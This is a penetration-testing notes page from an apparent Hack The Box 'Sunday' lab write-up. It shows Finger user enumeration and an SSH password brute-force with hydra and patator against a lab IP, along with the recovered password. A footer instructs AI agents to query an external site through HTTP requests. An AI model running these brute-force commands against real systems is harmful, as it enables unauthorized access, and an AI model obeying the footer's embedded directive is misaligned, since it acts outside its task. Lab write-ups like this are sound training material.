# Enum Finger and Brute SSH

## Enumerate Finger Users

REF: [htb:sunday](/02-scanning/02-enum-finger-and-ssh.md)

```
Scan:
> sudo nmap -sV -O -A 10.129.87.199

Found:
79/tcp    open     finger      Sun Solaris fingerd

Finger:
> finger @10.129.87.203      ..no one logged on
> finger root@10.129.87.203  ..root logged on


Finger-Script:
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

> ./finger-user-enum.pl -U /opt/useful/SecLists/Usernames/Names/names.txt -t 10.129.87.203

sammy@10.129.87.203: sammy  console  <Sep 30 13:21>
sunny@10.129.87.203: sunny  pts/3    <Apr 24, 2018> 10.10.14.4
```

## Brute SSH

```
hydra -V -I -l sunny -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt 10.129.87.203 ssh -s 22022

patator ssh_login host=10.129.87.203 port=22022 user=sunny password=FILE0 0=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt persistent=0

> ssh sunny@10.129.87.203 -p 22022
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.129.87.203 -p 22022
pw: sunday
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/02-scanning/02-enum-finger-and-ssh.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.